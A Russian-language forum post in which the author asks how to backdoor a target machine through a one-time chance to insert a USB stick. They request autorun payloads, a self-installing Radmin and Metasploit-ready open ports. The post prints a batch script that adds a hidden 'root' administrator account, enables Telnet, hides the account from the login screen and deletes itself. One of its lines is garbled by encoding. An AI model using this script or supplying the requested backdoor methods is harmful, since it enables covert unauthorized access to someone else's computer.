Есть машина. К машине нужно получить доступ. Есть одноразовая возможность подсунуть машине флешку.

Собственно весь вопрос: какой софт/скрипт посоветуете впихнуть на флешку? Есть ли какие-то сборки Радмина, которые при запуске скопируются в автозапуск машины, если к ним естественно приписать autorun на флешке. Или же написать батник, который откроет уязвимые порты для дальнейшей работы через metasploit.

Пробовал один батник:

.SpoilerTarget" type="button">Spoiler: *bat
@Echo off

Net user root root /add >nul

Net localgroup net localgroup Ђ¤¬ЁЁбва в®ал root /add >nul

Net accounts /maxpwage:unlimited >nul

Sc config TlntSvr start= auto >nul

Sc start TlntSvr >nul

Reg add “HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersio n\Winlogon\SpecialAccounts\UserList ” /v root /t REG_DWORD /d 0 >null

Del addnewadminroot.bat
Тестировал на виртуальной машине (win7/10) - подключиться не получилось

Есть флешка через которую можно подсунуть что-то; есть небольшие познания в Kali и сильное желание их всевозможно расширять. Так же доступ к локальной сети с этой машиной.

Прошу направить на нужные статьи/ресурсы/темы, но лучше сразу дать идею. Попытка есть всего одна, очень сильно прошу помочь. Пишите все возможные варианты создания backdoor'а на этой машине.